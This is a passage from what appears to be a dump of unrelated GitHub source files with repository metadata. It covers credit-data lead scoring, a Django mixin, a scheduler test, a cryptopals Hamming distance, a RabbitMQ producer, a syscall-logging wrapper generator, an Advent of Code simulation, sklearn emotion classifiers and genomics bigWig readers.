'60daylatethepast3months_1MO',\n '90dayormorelatepast3months_1MO',\n '30daylatepast6months_1MO',\n '60daylatepast6months_1MO',\n '90ormoredaylatepast6months_1MO',\n '30daylatepast12months_1MO',\n '60daylatepast12months_1MO',\n '90dayormorelatepast12months_1MO',\n 'dayspastduecurrently_1MO',\n 'FHAloans_1MO',\n 'openVAloans_1MO',\n 'openFinanceMortgageloans_1MO',\n 'MortgageOpenTradeLines',\n 'MortgageSumPayment',\n 'MortgageSumBalance',\n 'Numberof60DPDwithinthelast12months',\n 'Numberof60DPDwithinthelast18months',\n 'Numberof90DPDwithinthelast12months',\n 'Numberof90DPDwithinthelast18months',\n 'WeeksSinceLastTarget',\n 'DaysSinceLastTarget',\n 'AgeOfOldestOpenAndCurrentRevolvingTrade',\n 'NumOfOpenAndCurrentFinanceTrades',\n 'HighestRevolvingCreditAmount',\n 'KeycodedAggBalCredLimitRatioForOpenRevolvingTrades',\n 'MinBalToCreditOpenAuto',\n 'MaxBalToCreditOpenAuto',\n 'FICOTier',\n 'TargetedInLast30',\n 'TargetedInLast60',\n 'TargetedInLast90',\n 'TargetedInLast180',\n 'TimesTargetedLast30',\n 'TimesTargetedLast60',\n 'TimesTargetedLast90',\n 'TimesTargetedLast180',\n 'TimesTargeted',\n 'AnnualPercentageRate',\n 'Payment',\n 'MonthsSinceOpen']\n \n for col in NAs_cols:\n if (col in data.columns) and (col in imp_var.cols) :\n data[col] = data[col].fillna(0)\n \n \n mean_cols = [ 'Age',\n 'FICO5Score',\n 'FICO8Score',\n 'FICO8AutoScore',\n 'FICO9Score',\n 'FICO9AutoScore',\n 'Monthlypaymentamountofhighestmortgagetrade_1MO',\n 'Cumulativemonthlypaymentsforallopenmortgagetrades_1MO',\n 'BalanceofopenFHAloan_1MO',\n 'CumulativebalancesofopenFHAloan_1MO',\n 'AgeofmostrecentFHAmortgagetrade_1MO',\n 'AgeofmostrecentVAmortgagetrade_1MO',\n 'BalanceofopenFinanceMortgage_1MO',\n 'CumulativebalancesofopenFinanceloan_1MO',\n 'AgeofmostrecentFinancemortgagetrade_1MO',\n 'MortgageSumHighCredit',\n 'PErsonalLoanSumPayment',\n 'PErsonalLoanSumHighCredit',\n '3MonthFICO5Delta',\n '6MonthFICO5Delta',\n '12MonthFICO5Delta',\n '18MonthFICO5Delta',\n '3MonthFICOAutoDelta',\n '6MonthFICOAutoDelta',\n '12MonthFICOAutoDelta',\n '18MonthFICOAutoDelta',\n 'MonthsSinceMostRecentMortgageOpened',\n 'MortgageLTV']\n \n for col in mean_cols:\n if (col in data.columns) and (col in imp_var.cols):\n mean_value=data[col].mean()\n data[col].fillna(value=mean_value, inplace=True)\n \n \n obj_cols_to_transform = ['MailType',\n 'OpenTradeLinesAuto',\n 'MortgageWorstDelinqEverReptdStatusCodeValue',\n 'Typecodeformostrecentlyopenedmortgagetrade_1MO']\n \n for col in obj_cols_to_transform:\n col_values = data[col].unique()\n for val in col_values:\n data[col + \"_\" + str(val)] = np.where(data[col] == val, 1, 0)\n \n data = data.drop(obj_cols_to_transform, axis=1)\n \n data_validation = data[imp_var.cols]\n \n \n data_validation[['ZIPCode', 'Individual_ID']] = data[['ZIPCode', 'Individual_ID']]\n \n return data_validation\n\n\n\ndef mf_sample(data_validation):\n import sys\n import sklearn.neighbors._base\n sys.modules['sklearn.neighbors.base'] = sklearn.neighbors._base\n #pip install misspy for installation\n from missingpy import MissForest\n import pandas as pd\n import numpy as np\n \n data_validation_sample = data_validation.sample(n=1000, random_state=42)\n \n imputer = MissForest(random_state=42)\n data_imputed = imputer.fit_transform(data_validation_sample)\n \n scaled_data_for_mf = pd.DataFrame(data_imputed, index=data_validation_sample.index, columns=data_validation_sample.columns)\n data_validation_sample[scaled_data_for_mf.columns] = scaled_data_for_mf\n \n return data_validation_sample\n\n\n\ndef dict_final(data_validation_sample):\n import pandas as pd\n\n dict_final = {'ZIPCode': data_validation_sample['ZIPCode'], 'Individual_ID': data_validation_sample['Individual_ID']}\n data_final = pd.DataFrame(dict_final)\n\n return data_final\n\ndef drop_zip_id(data_validation_sample):\n import pandas as pd\n return data_validation_sample.drop(['ZIPCode', 'Individual_ID'], axis=1)\n\ndef get_users(data_validation_sample, data_final):\n import pandas as pd\n import numpy as np\n import lightgbm as lgb\n filepath = \"../Data/TrainDataMf.csv\"\n\n train_data_mf = pd.read_csv(filepath) \n \n x_train_mf = train_data_mf.drop(['Lead Flag', 'ZIPCode'], axis=1)\n y_train_mf = train_data_mf['Lead Flag']\n \n model_mf = lgb.LGBMClassifier(learning_rate=0.1,max_depth=3,random_state=42)\n model_mf.fit(x_train_mf,y_train_mf, verbose=20)\n \n predict = model_mf.predict_proba(data_validation_sample)[:,1]\n \n data_final['Lead Flag'] = np.where(predict > 0.8, 1, 0)\n data_final['prediction'] = predict\n data_final = data_final[data_final['Lead Flag'] == 1]\n \n return data_final","repo_name":"lahanyan/Capstone","sub_path":"Validation(X6)/validation_functions.py","file_name":"validation_functions.py","file_ext":"py","file_size_in_byte":6204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2679209629","text":"from django.shortcuts import redirect\nfrom django.views.generic.base import ContextMixin\nfrom django.views.generic.detail import SingleObjectMixin\nfrom .forms import VentaForm, VentaDetalleFormSet\n\nclass VentaContextMixin(ContextMixin):\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(VentaContextMixin, self).get_context_data(**kwargs)\n\t\tcontext['named_formsets'] = self.get_named_formsets()\n\t\treturn context\n\n\tdef get_named_formsets(self):\n\t\treturn {\n\t\t\t'detalle': VentaDetalleFormSet(self.request.POST or None, prefix='detalle', instance = self.object),\n\t\t}\n\n\tdef form_valid(self, form):\n\t\tnamed_formsets = self.get_named_formsets()\n\t\tif not all((x.is_valid() for x in named_formsets.values())):\n\t\t\treturn self.render_to_response(self.get_context_data(form=form))\n\t\telse:\n\t\t\tself.object = form.save()\n\n\t\tfor name, formset in named_formsets.items():\n\t\t\tformset_save_func = getattr(self, 'formset_{0}_valid'.format(name), None)\n\t\t\tif formset_save_func is not None:\n\t\t\t\tformset_save_func(formset)\n\t\t\telse:\n\t\t\t\tformset.save()\n\t\treturn redirect(self.success_url)\n\n\tdef formset_detalle_valid(self, formset):\n\t\tdetalles = formset.save(commit=False)\n\t\tprint(detalles)\n\t\tfor obj in formset.deleted_objects:\n\t\t\tobj.delete()\n\n\t\tfor detalle in detalles:\n\t\t\tprint(detalle)\n\t\t\tdetalle.venta = self.object\n\t\t\tdetalle.save()","repo_name":"jinchuika/u-seminario","sub_path":"main/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"467661009","text":"# coding: utf8\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport pytz\nfrom datetime import date, datetime\n\nimport pytest\n\nfrom common.tester.factories import create_station\n\nfrom travel.rasp.api_public.api_public.v3.station.base_scheduler import BaseScheduler\nfrom travel.rasp.api_public.api_public.v3.core.api_errors import ApiError\n\n\npytestmark = [pytest.mark.dbuser]\n\n\ndef _make_scheduler_and_check_base(station, event):\n moscow_pytz = pytz.timezone(\"Europe/Moscow\")\n query = {\n \"dt\": datetime(2020, 12, 22, 0, 0, 0),\n \"result_pytz\": moscow_pytz,\n \"event\": event,\n \"show_systems\": [\"yandex\"]\n }\n scheduler = BaseScheduler(query, station)\n scheduler.set_event()\n\n assert scheduler.station.id == station.id\n assert scheduler.date == date(2020, 12, 22)\n assert scheduler.result_pytz == moscow_pytz\n assert scheduler.base_json[\"date\"] == date(2020, 12, 22)\n assert scheduler.base_json[\"station\"][\"code\"] == \"s100\"\n\n return scheduler\n\n\ndef test_base_scheduler():\n station = create_station(id=100)\n\n scheduler =_make_scheduler_and_check_base(\n station, event=\"\"\n )\n assert scheduler.event == \"departure\"\n assert scheduler.base_json[\"event\"] == \"departure\"\n\n scheduler =_make_scheduler_and_check_base(station, event=\"departure\")\n assert scheduler.event == \"departure\"\n assert scheduler.base_json[\"event\"] == \"departure\"\n\n scheduler =_make_scheduler_and_check_base(station, event=\"arrival\")\n assert scheduler.event == \"arrival\"\n assert scheduler.base_json[\"event\"] == \"arrival\"\n\n with pytest.raises(ApiError) as ex:\n _make_scheduler_and_check_base(station, event=\"pribitie\")\n assert ex.value.message == \"event должен принимать значения arrival, departure или быть пустым.\"\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"travel/tests/v3/station/test_base_scheduler.py","file_name":"test_base_scheduler.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37208993821","text":"# Hamming Distance Function for s1c6\n\ndef hammingDistance(in1,in2):\n dist_count = 0\n pairedIns = zip(bytearray(in1),bytearray(in2))\n for each_1,each_2 in pairedIns:\n dist_count += bin(each_1^each_2).count('1')\n return dist_count\n\n\n# Test inputs for cryptopals s1-c6 PART 1/2\n\n#x = 'this is a test'\n#y = 'wokka wokka!!!'\n\n#print hammingDistance(x,y)","repo_name":"exinmusic/py2-cryptopals","sub_path":"crypt06_1.py","file_name":"crypt06_1.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37539538236","text":"import pika\r\nimport time\r\nimport random\r\n\r\n\r\nconnection_parameters = pika.ConnectionParameters('localhost')\r\n\r\nconnection = pika.BlockingConnection(connection_parameters)\r\n\r\nchannel = connection.channel()\r\n\r\nchannel.queue_declare(queue='kursova')\r\n\r\nmessageId =1\r\n\r\nwhile(True):\r\n\r\n channel.basic_publish(exchange='', routing_key='kursova', body=message)\r\n\r\n print(f\"sent message: {message}\")\r\n\r\n time.sleep(random.uniform(1, 2))\r\n \r\n messageId+=1\r\n\r\n message = (f\"Sending Message Id:{messageId}\")\r\n","repo_name":"Tk4V/labs","sub_path":"Kursova_robota_1/Producer.py","file_name":"Producer.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9059356919","text":"import csv\n\ndef init(str):\n param = ''\n while(True):\n if (str[-1] == '*' or str[-1] == ' '):\n break\n param = str[-1] + param\n str = str[:-1]\n return [str, param]\n\nwith open('syscall.txt',encoding='utf-8') as f:\n with open('hook_fuc.h', 'w+', encoding='utf-8') as fo1:\n with open('hook_sys.h', 'w+',encoding='utf-8') as fo2:\n content = csv.reader(f, delimiter=',')\n for x in content:\n sys_name = x[0]\n res = 'asmlinkage long (*real_sys_' + sys_name + ')'\n res_more = 'asmlinkage long _hook_sys_' + sys_name\n res = res + '('\n res_more = res_more + '('\n params = ''\n for i in range(1, 7):\n if (x[i] != ''):\n after_exe = init(x[i])\n res = res + after_exe[0] + ','\n res_more = res_more + x[i] + ','\n params = params + after_exe[1] + ','\n if (res[-1] == ','):\n res = res[:-1]\n if (res_more[-1] == ','):\n res_more = res_more[:-1]\n params = params[:-1]\n res = res + ');'\n res_more = res_more + \\\n ')\\n{\\n\\tprintk(KERN_ERR \"syscall:' +\\\n sys_name +\\\n '\\\\n\");\\n\\treturn real_sys_' +\\\n sys_name +\\\n '(' +\\\n params +\\\n ');'+\\\n '\\n}\\n'\n fo1.write(res+'\\n')\n fo2.write(res_more + '\\n')\n","repo_name":"mikelhpdatke/ISIHunter","sub_path":"syscall.py","file_name":"syscall.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37503320260","text":"class Moon():\n\n def __init__(self, x, y, z):\n self.x = x\n self.y = y\n self.z = z\n self.vx = 0\n self.vy = 0\n self.vz = 0\n\n def apply_gravity(self, moon):\n self.vx += Moon.gravity_change(self.x, moon.x)\n self.vy += Moon.gravity_change(self.y, moon.y)\n self.vz += Moon.gravity_change(self.z, moon.z)\n\n def move(self):\n self.x += self.vx\n self.y += self.vy\n self.z += self.vz\n\n def potential_energy(self):\n return abs(self.x) + abs(self.y) + abs(self.z)\n\n def kinetic_energy(self):\n return abs(self.vx) + abs(self.vy) + abs(self.vz)\n\n def total_energy(self):\n return self.potential_energy() * self.kinetic_energy()\n\n def __str__(self):\n return f\"({self.x}, {self.y}, {self.z}) -> <{self.vx}, {self.vy}, {self.vz}>\"\n\n @staticmethod\n def gravity_change(x1, x2):\n if x1 == x2:\n return 0\n return 1 if x1 < x2 else -1\n\n\ndef apply_gravitys(moon, rest):\n for another in rest:\n moon.apply_gravity(another)\n\n\nmoons = [\n Moon(13, -13, -2),\n Moon(16, 2, -15),\n Moon(7, -18, -12),\n Moon(-3, -8, -8)\n]\n\nnum_steps = 1000\n# num_steps = 10\n\n# moons = [\n# Moon(-1, 0, 2),\n# Moon(2, -10, -7),\n# Moon(4, -8, 8),\n# Moon(3, 5, -1)\n# ]\n\nfor step in range(num_steps):\n for moon in moons:\n apply_gravitys(moon, moons)\n\n for moon in moons:\n moon.move()\n\nmoons_energy = [m.total_energy() for m in moons]\n\nprint(sum(moons_energy))\n","repo_name":"wpedrak/advent_of_code","sub_path":"2019/12/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14372757992","text":"import sys\nimport numpy\nimport numpy as np\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport json\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import tree\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import GridSearchCV\n\n# Task 2.1\n# Printing the whole array (without dots)\nnumpy.set_printoptions(threshold=sys.maxsize)\ndata_list = json.load(open('goemotions.json', 'r'))\n\nparametersNB = {\n 'alpha': (0.5, 0, 2, 1, 2.5, 1.5)\n}\nparametersDT = {\n 'criterion': [\"gini\"],\n 'max_depth': (10, 20),\n 'min_samples_split': (2, 3, 4)\n}\nparametersMLP = {\n 'activation': ('identity', 'logistic', 'tanh', 'relu'),\n 'solver': ('sgd', 'adam'),\n 'hidden_layer_sizes': [(30, 50), (10, 10, 10)],\n 'max_iter': [1]\n}\n# convert the list into 2D Array\narrayData = np.array(data_list)\npromptArray = []\n\n# Separate prompt from Emo. & Sent.\nfor x in arrayData:\n promptArray.append(x[0])\n\n# Get the total words count\ncorpus = np.array(promptArray)\nvectorizer = CountVectorizer()\nX = vectorizer.fit_transform(corpus)\n\n# print(vectorizer.get_feature_names_out())\n# print()\n# print(\"Total word vocabulary: \", len(vectorizer.get_feature_names_out()))\n# print()\n##################################################################################\n\n# Task 2.2\ntraining_data, testing_data = train_test_split(arrayData, test_size=0.2, random_state=75)\n\n# print(f\"No. of training examples: {training_data.shape[0]}\")\n# print(f\"No. of testing examples: {testing_data.shape[0]}\")\n\n##################################################################################\n\n# Task 2.3\nprompt_trainingData = []\nsentiment_trainingData = []\nemotions_trainingData = []\n\nprompt_testingData = []\nsentiment_testingData = []\nemotions_testingData = []\n\nfor x in training_data:\n prompt_trainingData.append(x[0])\n sentiment_trainingData.append(x[2])\n emotions_trainingData.append(x[1])\n\nfor x in testing_data:\n prompt_testingData.append(x[0])\n sentiment_testingData.append(x[2])\n emotions_testingData.append(x[1])\n\n# print(prompt_trainingData)\n# print(sentiment_trainingData)\n# print(emotions_trainingData)\n\n### Initialization of Classifiers Parameters ###\n# Create a NumPy array objects\ncorpusPrompt = np.array(prompt_trainingData)\ncorpusSentiment = np.array(sentiment_trainingData)\ncorpusEmotion = np.array(emotions_trainingData)\n#\nXprompt = vectorizer.fit_transform(corpusPrompt)\nySentiment = corpusSentiment\nyEmotion = corpusEmotion\nprompt_testData = vectorizer.transform(np.array(prompt_testingData))\n\n# MNB Classifier\nclassifier = MultinomialNB()\n\n# DT Classifier\ndtc = tree.DecisionTreeClassifier()\n\n\n# # MLP Classifier\nmlp_sentiment = MLPClassifier(max_iter=1)\nmlp_emotion = MLPClassifier(max_iter=1)\n\n\n# Task 2.3.1 (MNB)\ndef base_MNB():\n # modelNB_sentiment = classifier.fit(Xprompt, ySentiment)\n modelNB_emotions = classifier.fit(Xprompt, yEmotion)\n\n # predict_sentiment = modelNB_sentiment.predict(prompt_testData)\n predict_emotion = modelNB_emotions.predict(prompt_testData)\n\n print(predict_emotion)\n # print(emotions_testingData)\n\n\n# Task 2.3.2 (DT)\n\ndef base_DT():\n modelTree_sentiment = dtc.fit(Xprompt, ySentiment)\n modelTree_emotion = dtc.fit(Xprompt, yEmotion)\n\n treePredict_sentiment = modelTree_sentiment.predict(prompt_testData)\n treePredict_emotion = modelTree_emotion.predict(prompt_testData)\n\n print(treePredict_emotion)\n print(treePredict_sentiment)\n print(sentiment_testingData)\n\n# Task 2.3.3 (MLP) --> not accurate\n\ndef base_MLP():\n\n modelMLP_sentiment = mlp_sentiment.fit(Xprompt, ySentiment)\n modelMLP_emotion = mlp_emotion.fit(Xprompt, yEmotion)\n\n mlpPredict_sentiment = modelMLP_sentiment.predict(prompt_testData)\n mlpPredict_emotion = modelMLP_emotion.predict(prompt_testData)\n\n print(mlpPredict_emotion)\n print(mlpPredict_sentiment)\n print(emotions_testingData)\n\n\n# Task 2.3.4 (TOP MNB) --> Not accurate Warning because of alpha value = 0 in parameters\n\ndef top_MNB():\n gridTopMNB_sentiment = GridSearchCV(classifier, parametersNB)\n gridTopMNB_emotion = GridSearchCV(classifier, parametersNB)\n\n modelTopMNB_sentiment = gridTopMNB_sentiment.fit(Xprompt, ySentiment)\n modelTopMNB_emotion = gridTopMNB_emotion.fit(Xprompt, yEmotion)\n\n predictTopMNB_sentiment = modelTopMNB_sentiment.predict(prompt_testData)\n predictTopMNB_emotion = modelTopMNB_emotion.predict(prompt_testData)\n\n print(predictTopMNB_sentiment)\n print(predictTopMNB_emotion)\n print(emotions_testingData)\n print(sentiment_testingData)\n\n\n# Task 2.3.5 (TOP DT) --> Not accurate and takes a lot of time 7aywan\n\ndef top_DT():\n gridTopDT_sentiment = GridSearchCV(dtc, parametersDT)\n gridTopDT_emotion = GridSearchCV(dtc, parametersDT)\n\n modelTopDT_sentiment = gridTopDT_sentiment.fit(Xprompt, ySentiment)\n modelTopDT_emotion = gridTopDT_emotion.fit(Xprompt, yEmotion)\n\n predictTopDT_sentiment = modelTopDT_sentiment.predict(prompt_testData)\n predictTopDT_emotion = modelTopDT_emotion.predict(prompt_testData)\n\n print(predictTopDT_sentiment)\n print(predictTopDT_emotion)\n print(emotions_testingData)\n print(sentiment_testingData)\n\n\n# Task 2.3.6 (TOP MLP)\n\ndef top_MLP():\n gridTopMLP_sentiment = GridSearchCV(mlp_sentiment, parametersMLP)\n gridTopMLP_emotion = GridSearchCV(mlp_emotion, parametersMLP)\n\n modelTopMLP_sentiment = gridTopMLP_sentiment.fit(Xprompt, ySentiment)\n modelTopMLP_emotion = gridTopMLP_emotion.fit(Xprompt, yEmotion)\n\n predictTopMLP_sentiment = modelTopMLP_sentiment.predict(prompt_testData)\n predictTopMLP_emotion = modelTopMLP_emotion.predict(prompt_testData)\n\n print(predictTopMLP_sentiment)\n print(predictTopMLP_emotion)\n print(emotions_testingData)\n print(sentiment_testingData)\n\n\n##################################################################################\n\n# Task 2.5 (Different Splits)\ntraining_data1, testing_data1 = train_test_split(arrayData, test_size=0.4, random_state=75)\nprompt_trainingData1 = []\nsentiment_trainingData1 = []\nemotions_trainingData1 = []\n\nprompt_testingData1 = []\nsentiment_testingData1 = []\nemotions_testingData1 = []\n\nfor x in training_data1:\n prompt_trainingData1.append(x[0])\n sentiment_trainingData1.append(x[2])\n emotions_trainingData1.append(x[1])\n\nfor x in testing_data1:\n prompt_testingData1.append(x[0])\n sentiment_testingData1.append(x[2])\n emotions_testingData1.append(x[1])\n\n### Initialization of Classifiers Parameters ###\n# Create a NumPy array objects\ncorpusPrompt1 = np.array(prompt_trainingData1)\ncorpusSentiment1 = np.array(sentiment_trainingData1)\ncorpusEmotion1 = np.array(emotions_trainingData1)\nXprompt1 = vectorizer.fit_transform(corpusPrompt1)\nySentiment1 = corpusSentiment1\nyEmotion1 = corpusEmotion1\nprompt_testData1 = vectorizer.transform(np.array(prompt_testingData1))\n\n# MNB Classifier\nclassifier1 = MultinomialNB()\n\n# DT Classifier\ndtc1 = tree.DecisionTreeClassifier()\n\n# MLP Classifier\nmlp_sentiment1 = MLPClassifier(max_iter=1)\nmlp_emotion1 = MLPClassifier(max_iter=1)\n\n\n# 2.5 (Naive-Bayes)\ndef base_MNB1():\n modelNB_sentiment1 = classifier1.fit(Xprompt1, ySentiment1)\n modelNB_emotions1 = classifier1.fit(Xprompt1, yEmotion1)\n\n predict_sentiment1 = modelNB_sentiment1.predict(prompt_testData1)\n predict_emotion1 = modelNB_emotions1.predict(prompt_testData1)\n\n print(predict_emotion1)\n print(predict_sentiment1)\n print(emotions_testingData1)\n\n# 2.5 (DT)\ndef base_DT1():\n modelTree_sentiment1 = dtc1.fit(Xprompt1, ySentiment1)\n modelTree_emotion1 = dtc1.fit(Xprompt1, yEmotion1)\n\n treePredict_sentiment1 = modelTree_sentiment1.predict(prompt_testData1)\n treePredict_emotion1 = modelTree_emotion1.predict(prompt_testData1)\n\n print(treePredict_sentiment1)\n print(treePredict_emotion1)\n print(sentiment_testingData1)\n\n\n# Task 2.5 (MLP)\n\ndef base_MLP1():\n modelMLP_sentiment1 = mlp_sentiment1.fit(Xprompt1, ySentiment1)\n modelMLP_emotion1 = mlp_emotion1.fit(Xprompt1, yEmotion1)\n\n mlpPredict_sentiment1 = modelMLP_sentiment1.predict(prompt_testData1)\n mlpPredict_emotion1 = modelMLP_emotion1.predict(prompt_testData1)\n\n print(mlpPredict_emotion1)\n print(mlpPredict_sentiment1)\n print(emotions_testingData1)\n\n\n# Task 2.5 (TOP MNB)\n\ndef top_MNB1():\n gridTopMNB_sentiment1 = GridSearchCV(classifier, parametersNB)\n gridTopMNB_emotion1 = GridSearchCV(classifier1, parametersNB)\n\n modelTopMNB_sentiment1 = gridTopMNB_sentiment1.fit(Xprompt, ySentiment)\n modelTopMNB_emotion1 = gridTopMNB_emotion1.fit(Xprompt1, yEmotion1)\n\n predictTopMNB_sentiment1 = modelTopMNB_sentiment1.predict(prompt_testData)\n predictTopMNB_emotion1 = modelTopMNB_emotion1.predict(prompt_testData1)\n\n print(predictTopMNB_sentiment1)\n print(predictTopMNB_emotion1)\n print(emotions_testingData1)\n print(sentiment_testingData1)\n\n\n# Task 2.5 (TOP DT)\n\ndef top_DT1():\n gridTopDT_sentiment1 = GridSearchCV(dtc1, parametersDT)\n gridTopDT_emotion1 = GridSearchCV(dtc1, parametersDT)\n\n modelTopDT_sentiment1 = gridTopDT_sentiment1.fit(Xprompt, ySentiment)\n modelTopDT_emotion1 = gridTopDT_emotion1.fit(Xprompt1, yEmotion1)\n\n predictTopDT_sentiment1 = modelTopDT_sentiment1.predict(prompt_testData)\n predictTopDT_emotion1 = modelTopDT_emotion1.predict(prompt_testData1)\n\n print(predictTopDT_sentiment1)\n print(predictTopDT_emotion1)\n print(emotions_testingData1)\n print(sentiment_testingData1)\n\n\n# Task 2.5 (TOP MLP)\n\ndef top_MLP1():\n gridTopMLP_sentiment1 = GridSearchCV(mlp_sentiment1, parametersMLP)\n gridTopMLP_emotion1 = GridSearchCV(mlp_emotion1, parametersMLP)\n\n modelTopMLP_sentiment1 = gridTopMLP_sentiment1.fit(Xprompt1, ySentiment1)\n modelTopMLP_emotion1 = gridTopMLP_emotion1.fit(Xprompt1, yEmotion1)\n\n predictTopMLP_sentiment1 = modelTopMLP_sentiment1.predict(prompt_testData1)\n predictTopMLP_emotion1 = modelTopMLP_emotion1.predict(prompt_testData1)\n\n print(predictTopMLP_sentiment1)\n print(predictTopMLP_emotion1)\n print(emotions_testingData1)\n print(sentiment_testingData1)\n\n# Menu Selection\ndef menu(choice = None):\n print(\"************Welcome to Task-2 AI Classifier Demo**************\")\n while choice != -1:\n choice = int(input(\"\"\"\n 1: Base-MNB\n 2: Base-DT\n 3: Base-MLP\n 4: Top-MNB\n 5: Top-DT\n 6: Top-MLP\n For Different Splits, please choose an option:\n 7: Base-MNB\n 8: Base-DT\n 9: Base-MLP\n 10: Top-MNB\n 11: Top-DT\n 12: Top-MLP\n 13: Exit\n\n Please enter your classifier choice: \"\"\"))\n if choice == 1:\n base_MNB()\n elif choice == 2:\n base_DT()\n elif choice == 3:\n base_MLP()\n elif choice == 4:\n top_MNB()\n elif choice == 5:\n top_DT()\n elif choice == 6:\n top_MLP()\n elif choice == 7:\n base_MNB1()\n elif choice == 8:\n base_DT1()\n elif choice == 9:\n base_MLP1()\n elif choice == 10:\n top_MNB1()\n elif choice == 11:\n top_DT1()\n elif choice == 12:\n top_MLP1()\n elif choice == 13:\n sys.exit()\n else:\n print(\"You must only select a number from 1 to 13, so please try again\")\n choice = int(input(\"Please re-enter your choice: \"))\n# Start the Menu\nmenu()\n","repo_name":"A-BAKLEH/AI-Project","sub_path":"MP1/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":11591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70421147432","text":"import numpy as np\nimport glob, os\nimport pyBigWig\nfrom .l0approximator.poissonfunctions import l0poissonapproximateCondensed, l0poissonbreakpoint\nfrom sklearn.mixture import BayesianGaussianMixture\nfrom distinctipy import distinctipy\n\ndef _read_bed(path):\n '''\n Read the content of a bed file\n path: the path to a bed file\n '''\n with open(path,'r') as file:\n data = file.readlines()\n data = [i.split() for i in data]\n chrs = [i[0] for i in data]\n s = [int(i[1]) for i in data]\n e = [int(i[2]) for i in data]\n return chrs, s, e\n\ndef _read_from_bigwig(vec, path, chr, start, end):\n '''\n Read from a bigwig file\n vec: vec is an array that is overwritten with the values from bigwig.\n path: path of the bigwig file\n chr: chromosome number.\n start: starting index in the chromosome number.\n end: ending index in the chromosome number.\n '''\n with pyBigWig.open(path) as bigwig:\n vec[:(end-start)] = np.array(bigwig.values(chr,start,end))\n np.nan_to_num(vec,copy=False,nan=0)\n\ndef mean_nan_to_zero(arr):\n mask = np.isnan(arr)\n if np.all(mask):\n return 0\n else:\n return np.nanmean(arr)*np.sum(~np.isnan(arr))/len(arr)\n\ndef _read_from_bigwig_breakpoints(vec, path, chr, start, end, bps):\n '''\n Read from a bigwig file\n vec: vec is an array that is overwritten with the values from bigwig.\n path: path of the bigwig file\n chr: chromosome number.\n start: starting index in the chromosome number.\n end: ending index in the chromosome number.\n '''\n with pyBigWig.open(path) as bigwig:\n if len(bps) == 0:\n vec[0] = mean_nan_to_zero(bigwig.values(chr,start,end))\n else:\n vec[0] = mean_nan_to_zero(bigwig.values(chr,start,bps[0]))\n for i in range(len(bps)-1):\n arr = bigwig.values(chr,bps[i],bps[i+1])\n vec[i+1] = mean_nan_to_zero(bigwig.values(chr,bps[i],bps[i+1]))\n vec[len(bps)] = mean_nan_to_zero(bigwig.values(chr,bps[-1],end))\n\ndef _read_from_bigwig_binned(vec, path, chr, start, end, bin_size):\n '''\n Read from a bigwig file and return binned values\n vec: vec is an array that is overwritten with the values from bigwig.\n path: path of the bigwig file\n chr: chromosome number.\n start: starting index in the chromosome number.\n end: ending index in the chromosome number.\n bin_size: size of the bins.\n '''\n with pyBigWig.open(path) as bigwig:\n vals = np.array(bigwig.values(chr,start,end))\n np.nan_to_num(vals,copy=False,nan=0)\n if len(vals) % bin_size == 0:\n vec[:] = vals.reshape(-1,bin_size).mean(axis=1)\n else:\n vec[:-1] = vals[:int(bin_size * (len(vec)-1))].reshape(-1,bin_size).mean(axis=1)\n vec[-1] = vals[int(bin_size * (len(vec)-1)):].mean()\n #vec[:] = np.pad(vals, (0, bin_size - len(vals) % bin_size)).reshape(-1,bin_size).mean(axis=1) \n\ndef _read_from_bigwig_sampled(vec, path, chr, start, end, bin_size):\n with pyBigWig.open(path) as bigwig:\n vals = np.array(bigwig.values(chr,start,end))\n vec[:] = vals[::bin_size]\n np.nan_to_num(vec, copy=False, nan=0)\n\ndef _read_dict(path):\n with open(path, 'r') as file:\n data = file.readlines()\n data = [i.strip().split() for i in data]\n data = {i[0]:int(i[1]) for i in data}\n return data\n\ndef _read_arr(path):\n with open(path, 'r') as file:\n data = file.readlines()\n data = [float(i) for i in data]\n return data\n\ndef _fold_10_cv(data,lamb):\n k = 10\n ii = list(range(len(data)))\n np.random.shuffle(ii)\n fold_size = len(data)//k\n fold_val = np.empty(10)\n for i in range(k):\n tmp = np.copy(data)\n if i != 9:\n iitmp = ii[i*fold_size:(i+1)*fold_size]\n else:\n iitmp = ii[i*fold_size:]\n target = tmp[iitmp]\n tmp[iitmp] = np.mean(np.delete(tmp,iitmp))\n tmpseg = FPseg.poisseg(tmp,lamb)\n fold_val[i] = poisson(target, tmpseg[iitmp])\n if np.isinf(fold_val[i]):\n embed()\n return np.mean(fold_val)\n\ndef pick_lambda(data, lambdas):\n pass\n\ndef _bed_to_np(bed, chr, start, end):\n bed = [i.strip().split() for i in bed]\n bed = [[*i[:-2], np.array(i[-2].split(','), dtype=int), np.array(i[-1].split(','), dtype=int)] for i in bed]\n bed = filter(lambda x: x[0] == chr, bed)\n labels = np.empty(end-start, dtype=int) \n for i in bed:\n ends = i[-1] + i[-2]\n ii = np.where(np.logical_and(ends > start, i[-1] < end))\n startii = i[-1][ii]-start\n numii = i[-2][ii]\n for k in range(len(startii)):\n if startii[k] < 0:\n s = 0\n else:\n s = startii[k]\n if startii[k]+numii[k] > len(labels):\n e = len(labels)\n else:\n e = startii[k]+numii[k]\n \n 